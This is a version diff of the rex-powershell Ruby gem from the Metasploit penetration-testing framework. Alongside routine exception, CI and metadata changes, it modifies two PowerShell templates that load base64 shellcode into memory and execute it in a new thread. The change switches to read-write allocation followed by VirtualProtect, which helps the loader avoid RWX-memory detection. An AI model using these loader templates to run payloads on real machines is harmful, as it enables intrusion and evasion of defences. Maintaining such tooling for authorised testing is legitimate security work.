rex-powershell 0.1.91 → 0.1.95

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 03fb4a7843aafdad4a8a05217105768f959653f7b15c00273398afea46497385
-  data.tar.gz: 49fe72538e0fa7acc8a9f418cac9905d65e4fbf61e5b2b36cca4df6fbb20eee5
+  metadata.gz: bf167124561f5b5aa34b7b5117293e8d977a0c6c0efd936b450c3b3c605ee1c5
+  data.tar.gz: 91381dc9267c0f19c43be9bbc399928ab759427aff764e2682a0362abc05f0ba
 SHA512:
-  metadata.gz: 846f848e693acefa04b7850a983bfd52bccddc422d9454787fc241fc41323f55747f51d7707632fdca78376219ba7adee55c885b87b5d466376c95e1d5cf9993
-  data.tar.gz: e164850d612b3b32d98c5b620ef842f5ede29a86d5d5db0e0a8aa339aa471e01715a670be1ee75fa0223a823772df59ff16a05374ab06c0bfecb90f3d511a312
+  metadata.gz: d9659e411b02341fcb7a34f75a69a3b3237fd4619d6a51eab6914a695731497302bab232ea11ca9997f5c7cf05996eefb1e46e27e5edf7957d050853e16143c2
+  data.tar.gz: f7758453f3f03d28ff3a63270ffd6b7c1ae5a9a5890a66cf3334a76ad0db87db12f304319afa472ff29a6b5a7f9515957e7aaaf84a8116fa6d2d3fd06564b1f0

data/.github/workflows/verify.yml

@@ -0,0 +1,46 @@
+name: Verify
+
+on:
+  push:
+    branches:
+      - '*'
+  pull_request:
+    branches:
+      - '*'
+
+jobs:
+  test:
+    runs-on: ubuntu-18.04
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - 2.5
+          - 2.6
+          - 2.7
+          - 3.0
+        test_cmd:
+          - bundle exec rspec
+
+    env:
+      RAILS_ENV: test
+
+    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+
+      - name: ${{ matrix.test_cmd }}
+        run: |
+          echo "${CMD}"
+          bash -c "${CMD}"
+        env:
+          CMD: ${{ matrix.test_cmd }}

data/data/templates/to_mem_dotnet.ps1.template

@@ -5,9 +5,10 @@ $%{var_syscode} = @"
 	namespace %{var_kernel32} {
 		public class func {
 			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
-			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
 			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
 			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
 			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
 			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
 		}
@@ -21,10 +22,14 @@ $%{var_compileParams}.GenerateInMemory = $True
 $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+[Uint32]$%{var_opf} = 0
 
-$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ReadWrite)
 if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
 [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
-[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
-if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
-$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
+
+if ([%{var_kernel32}.func]::VirtualProtect($%{var_baseaddr},[Uint32]$%{var_code}.Length + 1, [%{var_kernel32}.func+MemoryProtection]::Execute, [Ref]$%{var_opf}) -eq $true ) {
+	[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+	if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+	$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
+}

data/data/templates/to_mem_pshreflection.ps1.template

@@ -1,27 +1,29 @@
 function %{func_get_proc_address} {
-	Param ($%{var_module}, $%{var_procedure})
-	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+        Param ($%{var_module}, $%{var_procedure})
+        $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
 
-	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+        return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
 }
 
 function %{func_get_delegate_type} {
-	Param (
-		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
-		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
-	)
+        Param (
+                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+                [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+        )
 
-	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
-	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
-	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+        $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+        $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+        $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
 
-	return $%{var_type_builder}.CreateType()
+        return $%{var_type_builder}.CreateType()
 }
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+[Uint32]$%{var_opf} = 0
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x04)
 
-$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
 [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
-
-$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
+if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualProtect), (%{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($%{var_buffer}, [Uint32]$%{var_code}.Length, 0x10, [Ref]$%{var_opf})) -eq $true) {
+        $%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+        [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
+}

data/lib/rex/powershell/command.rb

@@ -293,11 +293,11 @@ EOS
   # @return [String] Powershell command line with payload
   def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
     if opts[:encode_inner_payload] && opts[:encode_final_payload]
-      fail RuntimeError, ':encode_inner_payload and :encode_final_payload are incompatible options'
+      fail Exceptions::PowershellError, ':encode_inner_payload and :encode_final_payload are incompatible options'
     end
 
     if opts[:no_equals] && !opts[:encode_final_payload]
-      fail RuntimeError, ':no_equals requires :encode_final_payload option to be used'
+      fail Exceptions::PowershellError, ':no_equals requires :encode_final_payload option to be used'
     end
 
     psh_payload = case opts[:method]
@@ -310,7 +310,7 @@ EOS
       when 'msil'
         Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
       else
-        fail RuntimeError, 'No Powershell method specified'
+        fail Exceptions::PowershellError, 'No Powershell method specified'
     end
 
     if opts[:exec_rc4]
@@ -405,7 +405,7 @@ EOS
     end
 
     if command.length > 8191
-      fail RuntimeError, 'Powershell command length is greater than the command line maximum (8192 characters)'
+      fail Exceptions::PowershellCommandLengthError, 'Powershell command length is greater than the command line maximum (8192 characters)'
     end
 
     command

data/lib/rex/powershell/exceptions.rb

@@ -0,0 +1,16 @@
+# -*- coding: binary -*-
+
+module Rex
+module Powershell
+module Exceptions
+
+  class PowershellError < RuntimeError
+  end
+
+  class PowershellCommandLengthError < PowershellError
+  end
+
+end
+end
+end
+

data/lib/rex/powershell/obfu.rb

@@ -67,7 +67,7 @@ module Powershell
     # Deobfuscate a Powershell literal string value that was previously obfuscated by #scate_string_literal.
     #
     # @param [String] string The obfuscated Powershell expression to deobfuscate.
-    # @raises [RuntimeError] If the string can not be deobfuscated, for example because it was randomized using a
+    # @raises [Exceptions::PowershellError] If the string can not be deobfuscated, for example because it was randomized using a
     #   different routine, then an exception is raised.
     # @return [String] The string literal value.
     def self.descate_string_literal(string)
@@ -79,14 +79,14 @@ module Powershell
         format = Regexp.last_match(0)
         format_args = string[format.length..-1].strip
         unless format_args =~ /-f\s*('.',\s*)*('.')/
-          raise RuntimeError.new('The obfuscated string structure is unsupported')
+          raise Exceptions::PowershellError, 'The obfuscated string structure is unsupported'
         end
         format_args = format_args[2..-1].strip.scan(/'(.)'/).map { |match| match[0] }
         string = format[1...-1].strip
       end
 
       unless string =~ /^'.*'$/
-        raise RuntimeError.new('The obfuscated string structure is unsupported')
+        raise Exceptions::PowershellError, 'The obfuscated string structure is unsupported'
       end
       string = string.gsub(/'\s*\+\s*'/, '') # process all concatenation operations
       unless format_args.nil? # process all format string operations

data/lib/rex/powershell/output.rb

@@ -146,7 +146,7 @@ module Powershell
       elsif @code =~ /FromBase64String(\((?>[^)(]+|\g<1>)*\))/
         encoded_stream = Obfu.descate_string_literal(Regexp.last_match(1))
       else
-        raise RuntimeError, 'Failed to identify the base64 data'
+        raise Exceptions::PowershellError, 'Failed to identify the base64 data'
       end
 
       # Decode and decompress the string
@@ -157,7 +157,7 @@ module Powershell
         begin
           @code = Rex::Text.zlib_inflate(unencoded)
         rescue Zlib::DataError => e
-          raise RuntimeError, 'Invalid compression'
+          raise Exceptions::PowershellError, 'Invalid compression'
         end
       end
 

data/lib/rex/powershell/payload.rb

@@ -37,10 +37,10 @@ module Payload
   def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
     hash_sub = {}
     hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_win32_func]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_win32_func]		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_rwx]			= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
 
@@ -55,7 +55,6 @@ module Payload
   # Originally from PowerSploit
   #
   def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
-    # Intialize rig and value names
     rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
     rig.init_var(:func_get_proc_address)
     rig.init_var(:func_get_delegate_type)

data/lib/rex/powershell/script.rb

@@ -48,7 +48,7 @@ module Powershell
 
         # Close open file
         fd.close
-      rescue Errno::ENAMETOOLONG, Errno::ENOENT
+      rescue Errno::ENAMETOOLONG, Errno::ENOENT, Errno::EINVAL
         # Treat code as a... code
         @code = code.to_s.dup # in case we're eating another script
       end

data/lib/rex/powershell/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Powershell
-    VERSION = "0.1.91"
+    VERSION = "0.1.95"
   end
 end

data/lib/rex/powershell.rb

@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/powershell/version'
+require 'rex/powershell/exceptions'
 require 'rex/powershell/output'
 require 'rex/powershell/parser'
 require 'rex/powershell/obfu'

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-  version: 0.1.91
+  version: 0.1.95
 platform: ruby
 authors:
 - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2021-07-09 00:00:00.000000000 Z
+date: 2022-02-14 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake
@@ -173,6 +173,7 @@ executables: []
 extensions: []
 extra_rdoc_files: []
 files:
+- ".github/workflows/verify.yml"
 - ".gitignore"
 - ".rspec"
 - ".travis.yml"
@@ -188,6 +189,7 @@ files:
 - data/templates/to_mem_rc4.ps1.template
 - lib/rex/powershell.rb
 - lib/rex/powershell/command.rb
+- lib/rex/powershell/exceptions.rb
 - lib/rex/powershell/function.rb
 - lib/rex/powershell/obfu.rb
 - lib/rex/powershell/output.rb